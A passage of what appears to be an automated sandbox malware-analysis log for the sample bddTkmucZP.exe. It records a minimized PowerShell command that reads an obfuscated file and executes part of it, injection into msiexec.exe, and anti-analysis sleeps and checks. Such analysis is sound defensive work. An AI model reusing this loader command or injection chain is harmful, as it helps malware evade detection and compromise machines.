          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597787Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597603Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596999Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595795Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595029Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594695Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594592Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594261Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594150Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7495Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2231Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsg2A1D.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5216Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 760Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6968Thread sleep count: 2296 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6968Thread sleep count: 7561 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599124s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -599015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598796s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598468s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598249s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -598031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597787s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597603s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597218s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -597109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596999s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596124s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -596015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595795s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595468s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595249s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -595029s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594695s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594592s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594261s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5852Thread sleep time: -594150s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598796Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597787Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597603Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597218Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596999Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595795Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595029Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594695Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594592Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594261Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594150Jump to behavior
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\
          Source: msiexec.exe, 0000000B.00000002.2116644708.0000000008C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\
          Source: svchost.exe, 00000004.00000002.2111302321.0000022BB1C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2112564662.0000022BB7254000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2116644708.0000000008CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000001.00000002.1513466927.0000000005C5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\bddTkmucZP.exeAPI call chain: ExitProcess graph end nodegraph_0-3993
          Source: C:\Users\user\Desktop\bddTkmucZP.exeAPI call chain: ExitProcess graph end nodegraph_0-3988
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E70000Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Kabelforbindelsernes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Frontalangreb.Kon237';$Preaccommodating=$Kabelforbindelsernes.SubString(11763,3);.$Preaccommodating($Kabelforbindelsernes)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$kabelforbindelsernes=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\frontalangreb.kon237';$preaccommodating=$kabelforbindelsernes.substring(11763,3);.$preaccommodating($kabelforbindelsernes)"
          Source: C:\Users\user\Desktop\bddTkmucZP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$kabelforbindelsernes=gc -raw 'c:\users\user\appdata\roaming\svampestuvningernes\circumcising\subcommissionership\frontalangreb.kon237';$preaccommodating=$kabelforbindelsernes.substring(11763,3);.$preaccommodating($kabelforbindelsernes)"Jump to behavior
          Source: C:\Users\user\Desktop\bddTkmucZP.exeCode function: 0_2_73BE1096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_73BE1096
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
